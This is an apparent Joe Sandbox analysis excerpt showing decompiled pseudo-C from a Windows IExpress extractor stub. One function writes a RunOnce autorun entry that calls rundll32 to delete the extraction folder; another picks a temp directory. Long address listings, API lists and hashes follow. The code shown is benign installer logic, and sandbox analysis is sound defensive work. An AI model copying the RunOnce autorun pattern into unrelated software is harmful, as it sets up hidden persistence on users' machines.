                                                                                                                                                                                                                                                			E0005202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x58004; // 0x5a679bd9
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00056CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0005171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0005658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x59a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x591e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x591e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x591e5);
						if(_t90 != 0) {
							 *0x58580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E0005171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E000544B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0005658A( &_v268, 0x104, 0x51140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x58530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                                                                0x0005202a
                                                                                                                                                                                                                                                0x00052035
                                                                                                                                                                                                                                                0x0005203c
                                                                                                                                                                                                                                                0x00052041
                                                                                                                                                                                                                                                0x00052050
                                                                                                                                                                                                                                                0x0005205f
                                                                                                                                                                                                                                                0x00052064
                                                                                                                                                                                                                                                0x0005206f
                                                                                                                                                                                                                                                0x0005208c
                                                                                                                                                                                                                                                0x00052094
                                                                                                                                                                                                                                                0x00052257
                                                                                                                                                                                                                                                0x00052266
                                                                                                                                                                                                                                                0x00052266
                                                                                                                                                                                                                                                0x0005209a
                                                                                                                                                                                                                                                0x0005209b
                                                                                                                                                                                                                                                0x0005209d
                                                                                                                                                                                                                                                0x000520aa
                                                                                                                                                                                                                                                0x000520af
                                                                                                                                                                                                                                                0x000520c9
                                                                                                                                                                                                                                                0x000520d1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000520d3
                                                                                                                                                                                                                                                0x000520da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000520da
                                                                                                                                                                                                                                                0x000520e2
                                                                                                                                                                                                                                                0x00052103
                                                                                                                                                                                                                                                0x0005210e
                                                                                                                                                                                                                                                0x00052116
                                                                                                                                                                                                                                                0x00052122
                                                                                                                                                                                                                                                0x00052128
                                                                                                                                                                                                                                                0x0005212c
                                                                                                                                                                                                                                                0x00052179
                                                                                                                                                                                                                                                0x00052194
                                                                                                                                                                                                                                                0x000521de
                                                                                                                                                                                                                                                0x000521e4
                                                                                                                                                                                                                                                0x00052256
                                                                                                                                                                                                                                                0x00052256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052256
                                                                                                                                                                                                                                                0x00052196
                                                                                                                                                                                                                                                0x00052196
                                                                                                                                                                                                                                                0x0005219c
                                                                                                                                                                                                                                                0x0005219f
                                                                                                                                                                                                                                                0x0005219f
                                                                                                                                                                                                                                                0x000521a1
                                                                                                                                                                                                                                                0x000521a2
                                                                                                                                                                                                                                                0x000521a6
                                                                                                                                                                                                                                                0x000521a8
                                                                                                                                                                                                                                                0x000521b0
                                                                                                                                                                                                                                                0x000521b0
                                                                                                                                                                                                                                                0x000521b2
                                                                                                                                                                                                                                                0x000521b3
                                                                                                                                                                                                                                                0x000521bc
                                                                                                                                                                                                                                                0x000521c7
                                                                                                                                                                                                                                                0x000521cb
                                                                                                                                                                                                                                                0x000521f1
                                                                                                                                                                                                                                                0x000521f6
                                                                                                                                                                                                                                                0x000521fd
                                                                                                                                                                                                                                                0x000521ff
                                                                                                                                                                                                                                                0x000521ff
                                                                                                                                                                                                                                                0x00052204
                                                                                                                                                                                                                                                0x00052213
                                                                                                                                                                                                                                                0x00052218
                                                                                                                                                                                                                                                0x0005221d
                                                                                                                                                                                                                                                0x0005221d
                                                                                                                                                                                                                                                0x00052220
                                                                                                                                                                                                                                                0x00052220
                                                                                                                                                                                                                                                0x00052222
                                                                                                                                                                                                                                                0x00052223
                                                                                                                                                                                                                                                0x00052229
                                                                                                                                                                                                                                                0x0005223d
                                                                                                                                                                                                                                                0x00052249
                                                                                                                                                                                                                                                0x00052250
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052250
                                                                                                                                                                                                                                                0x000521d2
                                                                                                                                                                                                                                                0x000521d9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000521d9
                                                                                                                                                                                                                                                0x0005213a
                                                                                                                                                                                                                                                0x00052141
                                                                                                                                                                                                                                                0x00052144
                                                                                                                                                                                                                                                0x0005214c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052163
                                                                                                                                                                                                                                                0x00052172
                                                                                                                                                                                                                                                0x00052172
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052163
                                                                                                                                                                                                                                                0x000520ea
                                                                                                                                                                                                                                                0x000520f0
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00052050
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0005205F
                                                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0005208C
                                                                                                                                                                                                                                                  • Part of subcall function 0005171E: _vsnprintf.MSVCRT ref: 00051750
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000520C9
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000520EA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00052103
                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00052122
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00052134
                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00052144
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0005215B
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0005218C
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000521C1
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000521E4
                                                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0005223D
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00052249
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00052250
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                                • API String ID: 178549006-3765599613
                                                                                                                                                                                                                                                • Opcode ID: 9ce45b76fad6c23d091be6f3c8dfe4975a8cb56a2367234a57e911f8dabdecd7
                                                                                                                                                                                                                                                • Instruction ID: c879e6ff756330ac314ab4d41566cfe36b49bd319123d61a9f8a5959d9286e9c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ce45b76fad6c23d091be6f3c8dfe4975a8cb56a2367234a57e911f8dabdecd7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E511671A00614ABEB609F20DC49FEB7B7CEF56702F0042A4BE05E7191EA759D8D8B50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000555A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 232 555a0-555d9 call 5468f LocalAlloc 235 555fd-5560c call 5468f 232->235 236 555db-555f1 call 544b9 call 56285 232->236 242 55632-55643 lstrcmpA 235->242 243 5560e-55630 call 544b9 LocalFree 235->243 250 555f6-555f8 236->250 244 55645 242->244 245 5564b-55659 LocalFree 242->245 243->250 244->245 248 55696-5569c 245->248 249 5565b-5565d 245->249 255 556a2-556a8 248->255 256 5589f-558b5 call 56517 248->256 252 5565f-55667 249->252 253 55669 249->253 254 558b7-558c7 call 56ce0 250->254 252->253 257 5566b-5567a call 55467 252->257 253->257 255->256 260 556ae-556c1 GetTempPathA 255->260 256->254 270 55680-55691 call 544b9 257->270 271 5589b-5589d 257->271 264 556f3-55711 call 51781 260->264 265 556c3-556c9 call 55467 260->265 275 55717-55729 GetDriveTypeA 264->275 276 5586c-55890 GetWindowsDirectoryA call 5597d 264->276 269 556ce-556d0 265->269 269->271 273 556d6-556df call 52630 269->273 270->250 271->254 273->264 286 556e1-556ed call 55467 273->286 280 55730-55740 GetFileAttributesA 275->280 281 5572b-5572e 275->281 276->264 287 55896 276->287 284 55742-55745 280->284 285 5577e-5578f call 5597d 280->285 281->280 281->284 289 55747-5574f 284->289 290 5576b 284->290 298 55791-5579e call 52630 285->298 299 557b2-557bf call 52630 285->299 286->264 286->271 287->271 292 55771-55779 289->292 294 55751-55753 289->294 290->292 297 55864-55866 292->297 294->292 295 55755-55762 call 56952 294->295 295->290 308 55764-55769 295->308 297->275 297->276 298->290 309 557a0-557b0 call 5597d 298->309 306 557c1-557cd GetWindowsDirectoryA 299->306 307 557d3-557f8 call 5658a GetFileAttributesA 299->307 306->307 314 5580a 307->314 315 557fa-55808 CreateDirectoryA 307->315 308->285 308->290 309->290 309->299 316 5580d-5580f 314->316 315->316 317 55827-5585c SetFileAttributesA call 51781 call 55467 316->317 318 55811-55825 316->318 317->271 323 5585e 317->323 318->297 323->297
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E000555A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x58004; // 0x5a679bd9
				_v8 = _t28 ^ _t110;
				_t2 = E0005468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0005468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x59a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x58b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x58a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00056517(_t82, 0x7d2, 0, E00053210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x59a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x591e4;
									_t40 = GetTempPathA(0x104, 0x591e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00051781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00056952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0005597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00052630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0005658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x591e4;
																					E00051781(0x591e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00055467(0x591e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00052630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0005597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00055467(0x591e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x591e4;
											_t70 = E00052630(0, 0x591e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x591e4;
												_t71 = E00055467(0x591e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0005597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x58b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00055467(0x58b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E000544B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E000544B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x59124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x59124 = E00056285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00056CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                                                                0x000555ab
                                                                                                                                                                                                                                                0x000555b2
                                                                                                                                                                                                                                                0x000555c9
                                                                                                                                                                                                                                                0x000555d5
                                                                                                                                                                                                                                                0x000555d9
                                                                                                                                                                                                                                                0x00055600
                                                                                                                                                                                                                                                0x00055605
                                                                                                                                                                                                                                                0x0005560a
                                                                                                                                                                                                                                                0x0005560c
                                                                                                                                                                                                                                                0x00055638
                                                                                                                                                                                                                                                0x00055641
                                                                                                                                                                                                                                                0x00055643
                                                                                                                                                                                                                                                0x00055645
                                                                                                                                                                                                                                                0x00055645
                                                                                                                                                                                                                                                0x0005564c
                                                                                                                                                                                                                                                0x00055652
                                                                                                                                                                                                                                                0x00055657
                                                                                                                                                                                                                                                0x00055659
                                                                                                                                                                                                                                                0x00055696
                                                                                                                                                                                                                                                0x0005569c
                                                                                                                                                                                                                                                0x0005589f
                                                                                                                                                                                                                                                0x000558a7
                                                                                                                                                                                                                                                0x000558ac
                                                                                                                                                                                                                                                0x000558b3
                                                                                                                                                                                                                                                0x000558b5
                                                                                                                                                                                                                                                0x000556a2
                                                                                                                                                                                                                                                0x000556a2
                                                                                                                                                                                                                                                0x000556a8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000556ae
                                                                                                                                                                                                                                                0x000556ae
                                                                                                                                                                                                                                                0x000556b9
                                                                                                                                                                                                                                                0x000556bf
                                                                                                                                                                                                                                                0x000556c1
                                                                                                                                                                                                                                                0x000556f3
                                                                                                                                                                                                                                                0x000556f3
                                                                                                                                                                                                                                                0x00055705
                                                                                                                                                                                                                                                0x0005570a
                                                                                                                                                                                                                                                0x00055711
                                                                                                                                                                                                                                                0x00055717
                                                                                                                                                                                                                                                0x00055724
                                                                                                                                                                                                                                                0x00055726
                                                                                                                                                                                                                                                0x00055729
                                                                                                                                                                                                                                                0x00055730
                                                                                                                                                                                                                                                0x00055737
                                                                                                                                                                                                                                                0x0005573d
                                                                                                                                                                                                                                                0x00055740
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005572b
                                                                                                                                                                                                                                                0x0005572b
                                                                                                                                                                                                                                                0x0005572e
                                                                                                                                                                                                                                                0x00055742
                                                                                                                                                                                                                                                0x00055742
                                                                                                                                                                                                                                                0x00055745
                                                                                                                                                                                                                                                0x0005576b
                                                                                                                                                                                                                                                0x0005576b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055747
                                                                                                                                                                                                                                                0x00055747
                                                                                                                                                                                                                                                0x0005574d
                                                                                                                                                                                                                                                0x0005574f
                                                                                                                                                                                                                                                0x00055771
                                                                                                                                                                                                                                                0x00055771
                                                                                                                                                                                                                                                0x00055773
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055751
                                                                                                                                                                                                                                                0x00055751
                                                                                                                                                                                                                                                0x00055753
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055755
                                                                                                                                                                                                                                                0x0005575b
                                                                                                                                                                                                                                                0x00055760
                                                                                                                                                                                                                                                0x00055762
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055764
                                                                                                                                                                                                                                                0x00055764
                                                                                                                                                                                                                                                0x00055769
                                                                                                                                                                                                                                                0x0005577e
                                                                                                                                                                                                                                                0x0005577e
                                                                                                                                                                                                                                                0x00055781
                                                                                                                                                                                                                                                0x00055788
                                                                                                                                                                                                                                                0x0005578d
                                                                                                                                                                                                                                                0x0005578f
                                                                                                                                                                                                                                                0x000557b2
                                                                                                                                                                                                                                                0x000557b8
                                                                                                                                                                                                                                                0x000557bd
                                                                                                                                                                                                                                                0x000557bf
                                                                                                                                                                                                                                                0x000557cd
                                                                                                                                                                                                                                                0x000557cd
                                                                                                                                                                                                                                                0x000557dd
                                                                                                                                                                                                                                                0x000557e3
                                                                                                                                                                                                                                                0x000557ef
                                                                                                                                                                                                                                                0x000557f5
                                                                                                                                                                                                                                                0x000557f8
                                                                                                                                                                                                                                                0x0005580a
                                                                                                                                                                                                                                                0x0005580a
                                                                                                                                                                                                                                                0x000557fa
                                                                                                                                                                                                                                                0x00055802
                                                                                                                                                                                                                                                0x00055802
                                                                                                                                                                                                                                                0x0005580d
                                                                                                                                                                                                                                                0x0005580f
                                                                                                                                                                                                                                                0x00055830
                                                                                                                                                                                                                                                0x00055836
                                                                                                                                                                                                                                                0x0005583d
                                                                                                                                                                                                                                                0x0005584b
                                                                                                                                                                                                                                                0x00055851
                                                                                                                                                                                                                                                0x00055855
                                                                                                                                                                                                                                                0x0005585a
                                                                                                                                                                                                                                                0x0005585c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005585e
                                                                                                                                                                                                                                                0x0005585e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005585e
                                                                                                                                                                                                                                                0x00055811
                                                                                                                                                                                                                                                0x00055817
                                                                                                                                                                                                                                                0x00055819
                                                                                                                                                                                                                                                0x0005581f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005581f
                                                                                                                                                                                                                                                0x00055791
                                                                                                                                                                                                                                                0x00055797
                                                                                                                                                                                                                                                0x0005579c
                                                                                                                                                                                                                                                0x0005579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000557a0
                                                                                                                                                                                                                                                0x000557a9
                                                                                                                                                                                                                                                0x000557ae
                                                                                                                                                                                                                                                0x000557b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000557b0
                                                                                                                                                                                                                                                0x0005579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055769
                                                                                                                                                                                                                                                0x00055762
                                                                                                                                                                                                                                                0x00055753
                                                                                                                                                                                                                                                0x0005574f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005572e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055864
                                                                                                                                                                                                                                                0x00055864
                                                                                                                                                                                                                                                0x00055864
                                                                                                                                                                                                                                                0x00055717
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000556c3
                                                                                                                                                                                                                                                0x000556c5
                                                                                                                                                                                                                                                0x000556c9
                                                                                                                                                                                                                                                0x000556ce
                                                                                                                                                                                                                                                0x000556d0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000556d6
                                                                                                                                                                                                                                                0x000556d6
                                                                                                                                                                                                                                                0x000556d8
                                                                                                                                                                                                                                                0x000556dd
                                                                                                                                                                                                                                                0x000556df
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000556e1
                                                                                                                                                                                                                                                0x000556e2
                                                                                                                                                                                                                                                0x000556e4
                                                                                                                                                                                                                                                0x000556e6
                                                                                                                                                                                                                                                0x000556eb
                                                                                                                                                                                                                                                0x000556ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000556f3
                                                                                                                                                                                                                                                0x000556f3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005586c
                                                                                                                                                                                                                                                0x00055878
                                                                                                                                                                                                                                                0x0005587e
                                                                                                                                                                                                                                                0x00055882
                                                                                                                                                                                                                                                0x00055883
                                                                                                                                                                                                                                                0x00055889
                                                                                                                                                                                                                                                0x0005588e
                                                                                                                                                                                                                                                0x0005588e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055896
                                                                                                                                                                                                                                                0x000556ed
                                                                                                                                                                                                                                                0x000556df
                                                                                                                                                                                                                                                0x000556d0
                                                                                                                                                                                                                                                0x000556c1
                                                                                                                                                                                                                                                0x000556a8
                                                                                                                                                                                                                                                0x0005565b
                                                                                                                                                                                                                                                0x0005565b
                                                                                                                                                                                                                                                0x0005565d
                                                                                                                                                                                                                                                0x00055669
                                                                                                                                                                                                                                                0x00055669
                                                                                                                                                                                                                                                0x0005565f
                                                                                                                                                                                                                                                0x0005565f
                                                                                                                                                                                                                                                0x00055665
                                                                                                                                                                                                                                                0x00055667
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055667
                                                                                                                                                                                                                                                0x0005566c
                                                                                                                                                                                                                                                0x00055673
                                                                                                                                                                                                                                                0x00055678
                                                                                                                                                                                                                                                0x0005567a
                                                                                                                                                                                                                                                0x0005589b
                                                                                                                                                                                                                                                0x0005589b
                                                                                                                                                                                                                                                0x00055680
